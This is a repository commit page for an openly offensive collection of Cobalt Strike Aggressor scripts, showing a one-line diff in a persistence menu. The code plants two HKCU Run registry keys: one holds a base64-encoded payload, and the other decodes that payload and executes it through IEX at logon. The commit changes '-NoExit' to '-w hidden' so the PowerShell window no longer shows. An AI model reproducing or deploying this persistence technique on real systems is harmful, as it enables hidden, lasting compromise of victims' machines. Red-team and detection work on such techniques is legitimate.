infosecn1nja
/
AggressorScripts
mirror of https://github.com/infosecn1nja/AggressorScripts.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixed powershell syntax to be hidden on HKCU

Logging
Harley Lebeau 2017-07-22 15:59:01 -04:00 committed by GitHub
parent 2b89279181
commit cee6421bc3
1 changed files with 1 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Persistence/Persistence_Menu.cna
View File

@ -182,7 +182,7 @@ sub persistRegistryPowerShell {
$powershellcmd = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname']."' -Type String -Value \"".$data."\"";
bpowershell!($bid, $powershellcmd);
blog($bid, "\cBSetting the first HKCU Run Key Value as '".$3['keyname']."'...");
$powershellcmd1 = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -NoExit -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
$powershellcmd1 = "Set-ItemProperty -Path 'HKCU:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '".$3['keyname1']."' -Value 'C:\\Windows\\SySWoW64\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden -c (IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run ".$3['keyname'].").".$3['keyname']."))))'";
bpowershell!($bid, $powershellcmd1);
blog($bid, "\cBSetting the second HKCU Run Key Value as '".$3['keyname1']."'...");
blog($bid, "\cBDisplaying both Run Keys to Verify everything worked as intended...");